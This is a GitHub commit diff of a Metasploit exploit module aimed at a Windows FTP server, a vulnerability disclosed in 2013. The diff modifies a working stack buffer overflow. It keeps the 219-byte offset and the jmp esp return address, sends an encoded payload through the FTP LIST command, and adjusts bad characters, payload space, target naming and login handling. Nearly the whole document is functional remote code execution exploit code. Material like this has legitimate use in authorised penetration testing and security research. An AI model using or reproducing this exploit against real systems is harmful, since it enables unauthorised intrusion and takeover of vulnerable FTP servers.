File tree Expand file tree Collapse file tree 1 file changed +8
-16
lines changed
modules/exploits/windows/ftp Expand file tree Collapse file tree 1 file changed +8
-16
lines changed Original file line number Diff line number Diff line change 8
8
require 'msf/core'
9
9
10
10
class Metasploit4 < Msf ::Exploit ::Remote
11
- Rank = AverageRanking
11
+ Rank = NormalRanking
12
12
13
13
include Msf ::Exploit ::Remote ::Ftp
14
14
@@ -31,43 +31,35 @@ def initialize(info = {})
31
31
[ 'OSVDB' , '90815' ] ,
32
32
[ 'EDB' , '24557' ] ,
33
33
] ,
34
- 'DefaultOptions' =>
35
- {
36
- 'EXITFUNC' => 'seh' ,
37
- 'target' => 0
38
- } ,
39
34
'Privileged' => false ,
40
35
'Payload' =>
41
36
{
42
- 'Space' => 900 ,
43
- 'BadChars' => "\x00 ~+&=% \x3a \x22 \ x0a\x0d \x20 \x2f \x5c \x2e \x09 " ,
37
+ 'Space' => 955 ,
38
+ 'BadChars' => "\x00 \ x0a\x0d \x20 \xff " ,
44
39
'StackAdjustment' => -3500 ,
45
40
} ,
46
41
'Targets' =>
47
42
[
48
43
[
49
- 'Windows XP English SP3 ' ,
44
+ 'Windows Universal ' ,
50
45
{
51
46
'Platform' => 'win' ,
52
- 'Ret' => 0x10028283 ,
47
+ 'Ret' => 0x10028283 , # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
53
48
'Offset' => 219 ,
54
49
} ,
55
50
] ,
56
51
] ,
52
+ 'DefaultTarget' => 0 ,
57
53
'DisclosureDate' => 'Feb 27 2013' ) )
58
54
end
59
55
60
56
def exploit
61
- connect
62
-
63
- print_status ( "Trying target #{ target . name } ..." )
57
+ connect_login
64
58
65
- buf = rand_text_english ( target [ 'Offset' ] , payload_badchars )
59
+ buf = rand_text ( target [ 'Offset' ] , payload_badchars )
66
60
buf << [ target [ 'Ret' ] ] . pack ( 'V' )
67
61
buf << payload . encoded
68
62
69
- send_cmd ( [ 'USER' , datastore [ 'FTPUSER' ] ] , false )
70
- send_cmd ( [ 'PASS' , datastore [ 'FTPPASS' ] ] , false )
71
63
send_cmd ( [ 'LIST' , buf ] , false )
72
64
73
65
handler
You can’t perform that action at this time.
0 commit comments